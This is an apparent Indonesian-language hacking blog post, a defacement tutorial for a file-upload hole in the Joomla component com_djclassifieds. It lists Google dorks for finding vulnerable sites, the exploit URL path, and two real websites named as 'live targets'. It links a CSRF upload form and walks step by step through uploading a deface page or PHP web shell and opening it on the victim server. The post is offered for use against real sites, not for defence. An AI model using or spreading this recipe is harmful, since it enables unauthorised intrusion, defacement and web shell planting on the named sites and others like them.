Home Dork exploit hacking Tutorial Deface Exploit Vulnerability Com_djclassifieds

Exploit Vulnerability Com_djclassifieds

Youe
LxSec Blog
Sunday, January 26, 2020

loading...
# Exploit Title : Com_djclassifieds Vulnerability
# Google Dork : inurl:/com_djclassifieds
                             inurl:/components/com_djclassifieds
# Exploit : /index.php?option=com_djclassifieds&task=upload&tmpl=component
# Live Target : https://www.paradisola.it/
                           http://www.viaggipenzo.it/

CSRF : https://pastebin.com/raw/EUnh5RB0 save dengan ekstensi .html

1. Kalian Dorking Dulu Atau Pakai Live Target Yang tertera
( gabisa upshell )

2.masukkan exploit di akhir domain contoh : http://site.lu/exploit

3. Jika tampilannya seperti ini berarti vuln


4. edit csrf dan ganti dengan target kamu, dibagian value="mini.phtml" ubah dengan nama sc deface kalian / shell kalian disini nama sc saya 0x.html


5. jika sudah di edit, langsung saja buka csrfnya di browser dan upload script deface atau shell kalian


6. jika muncul output seperti ini setelah upload sc / shell berarti berhasil


7. langsung saja akses dengan cara https://target.lu/tmp/djupload/namasc.html / nama shell.php

8. dan boom.. terdepes


Youe Sunday, January 26, 2020 Tags: Dork, exploit, hacking, Tutorial Deface

LihatTutupKomentar